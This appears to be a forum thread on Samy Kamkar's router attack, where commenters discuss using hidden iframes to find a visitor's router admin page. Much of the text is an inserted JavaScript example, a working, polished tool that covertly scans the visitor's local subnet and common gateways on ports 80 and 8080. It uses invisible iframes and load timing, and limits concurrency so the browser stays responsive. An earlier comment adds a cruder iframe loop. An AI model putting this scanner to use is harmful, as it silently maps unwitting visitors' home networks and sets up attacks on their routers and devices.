
Or even better, change the default IP address for the admin login. This attack relies on a bunch of hidden iframes loading IPs that are common default addresses of the admin login page.


How's that better? That's like changing the port SSH listens on to 2222 even though root's password is "root".


Twice I've had routers notify me that 192.168.0.1 is in use by another network service and automatically remap its own services to 10.0.0.x. One of these times was due to a DSL modem's web administration being on 192.168.0.1.


Let's assume the user is on 192.168.50.0/24. Can his attack figure that out?


The attack/code he showed cannot, but what you can do is write different iframes. Here is an example:

a+'.'+b+'.'+c+'.'+d

where a=192 b=168 c=0-255 d=0-255

Of course this could be any private network address range[1]. Next you would use document.write or .innerText to make these iframes. Personally I wouldn't stop at the first one. I would log all the frames that loaded into an array and from there test them further. I would also get the user's IP address and tack on :80, :8080, :21, etc. and see what I am presented with: web torrent frontends, ftp servers, etc.

[1] http://en.wikipedia.org/wiki/Private_network


This will take forever, and also make the user's browser unresponsive.

  // 65,536 iframes written synchronously: this is why the page locks up
  for (var c = 0; c <= 255; c++) {
    for (var d = 0; d <= 255; d++) {
      document.write('<iframe height="1" width="1" src="http://192.168.' + c + '.' + d + '" id="' + c + '.' + d + '" name="' + c + '.' + d + '"></iframe>');
    }
  }

<iframe> portscans, wow.

For a massively-deployed hack like Samy's, it makes plenty of sense to just check the small handful of major-brand wifi routers.
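The two comments above describe the same technique from opposite sides: enumerate the user's private range (and a few well-known gateway defaults) as hidden iframes, then log which ones load, versus the cost of writing tens of thousands of iframes at once. The following is an added example written for this page, not Samy's code or anything posted in the thread. It assumes a local IP the attacker already learned (192.168.50.23 here, a made-up value), an assumed list of common gateway addresses, and a heuristic that an iframe whose load event fires within a short timeout has something answering at that address. The pure parts (candidate ordering, batching) run under Node; the iframe probe only executes when a DOM is present.

```javascript
// Added example (not code from the thread): enumerate candidate LAN hosts
// and probe them from the browser a few at a time, so the page stays
// responsive. Pure helpers run under Node; the iframe probe needs a DOM.

// Assumed list of common default gateway addresses; the thread itself only
// names 192.168.0.1 and 10.0.0.x.
const COMMON_GATEWAYS = [
  '192.168.0.1', '192.168.1.1', '192.168.1.254', '192.168.2.1',
  '10.0.0.1', '10.0.0.138',
];

// Validate a dotted-quad IPv4 and return its first three octets ("a.b.c").
function slash24Prefix(ip) {
  const octets = String(ip).split('.');
  const ok = octets.length === 4 &&
    octets.every(o => /^\d{1,3}$/.test(o) && Number(o) <= 255);
  if (!ok) throw new Error('not an IPv4 address: ' + ip);
  return octets.slice(0, 3).join('.');
}

// All usable host addresses in a /24 (.1 through .254).
function hostsInSlash24(prefix) {
  const hosts = [];
  for (let d = 1; d <= 254; d++) hosts.push(prefix + '.' + d);
  return hosts;
}

// Probe order: well-known gateway defaults first, then the rest of the
// user's own /24 (derived from a local IP the attacker already learned),
// with duplicates removed so nothing is probed twice.
function probeOrder(localIp) {
  const seen = new Set();
  const ordered = [];
  const candidates = COMMON_GATEWAYS.concat(hostsInSlash24(slash24Prefix(localIp)));
  for (const h of candidates) {
    if (!seen.has(h)) { seen.add(h); ordered.push(h); }
  }
  return ordered;
}

// Expand a host into the URLs to try, one per port of interest.
function urlsFor(host, ports) {
  return ports.map(p => 'http://' + host + ':' + p + '/');
}

// Run probe(url) -> Promise<boolean> with at most `concurrency` in flight.
// Returns a Map url -> result. Bounding the in-flight probes is what keeps
// the browser usable instead of writing 65k iframes in one go.
async function probeAll(urls, probe, concurrency = 8) {
  const results = new Map();
  let next = 0;
  async function worker() {
    while (next < urls.length) {
      const url = urls[next++];
      results.set(url, await probe(url));
    }
  }
  const n = Math.min(concurrency, urls.length);
  await Promise.all(Array.from({ length: n }, worker));
  return results;
}

// Browser probe (heuristic): a hidden iframe whose load event fires before
// `timeoutMs` indicates something answered at that address (a web page, or a
// fast connection refusal rendered as an error page); a silent timeout
// usually means no host at all. Cross-origin content cannot be read, so
// timing is the only observable.
function iframeProbe(url, timeoutMs = 2000) {
  return new Promise(resolve => {
    const frame = document.createElement('iframe');
    frame.width = frame.height = '1';
    frame.style.visibility = 'hidden';
    const done = answered => {
      clearTimeout(timer);
      frame.remove();
      resolve(answered);
    };
    const timer = setTimeout(() => done(false), timeoutMs);
    frame.onload = () => done(true);
    frame.src = url;
    document.body.appendChild(frame);
  });
}

// Browser-only usage: probe the /24 of an assumed local IP on 80 and 8080.
if (typeof document !== 'undefined') {
  const urls = probeOrder('192.168.50.23').flatMap(h => urlsFor(h, [80, 8080]));
  probeAll(urls, iframeProbe).then(results => {
    const live = [...results].filter(([, up]) => up).map(([u]) => u);
    console.log('responded:', live);
  });
}
```

Two caveats a practitioner would add: the load-before-timeout heuristic says only that something answered, not what; distinguishing a router login page from a printer still needs a follow-up request. And modern browsers refuse to connect to some ports over HTTP (21 among them), so the ":21" idea from the thread no longer works from an iframe.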


I totally agree. You should only be checking for routers that have known vulnerabilities, but that was not the initial question.



